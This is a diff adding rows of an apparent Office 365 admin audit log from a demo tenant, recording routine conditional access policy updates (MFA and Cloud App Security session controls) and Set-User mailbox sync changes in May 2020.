+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/16/2020 6:05:58 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-16T06:05:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/16/2020 6:05:57 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-16T06:05:57Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/16/2020 6:05:57 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-16T06:05:57Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/16/2020 6:05:57 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-16T06:06:00Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/16/2020 6:05:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-16T06:05:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/16/2020 6:05:58 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-16T06:05:59Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/16/2020 6:05:59 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-16T06:05:59Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/16/2020 6:05:58 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-16T06:05:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/16/2020 6:05:58 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-16T06:05:57Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/16/2020 6:05:57 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-16T06:05:56Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/16/2020 6:05:56 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-15T23:50:35Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T05:52:40Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T06:48:04Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T06:48:04Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T09:20:18Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T09:20:17Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T10:47:00Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-16T11:20:10Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-17T03:04:53Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/17/2020 3:04:53 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-17T03:04:52Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/17/2020 3:04:52 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-17T03:04:53Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/17/2020 3:04:53 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-17T03:04:52Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/17/2020 3:04:52 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-17T03:04:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/17/2020 3:04:53 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-17T03:04:53Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/17/2020 3:04:53 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-17T03:04:53Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/17/2020 3:04:53 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-17T03:04:53Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/17/2020 3:04:52 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-17T03:04:52Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/17/2020 3:04:52 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-17T03:04:52Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/17/2020 3:04:52 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-17T03:04:52Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/17/2020 3:04:51 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-17T03:04:51Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
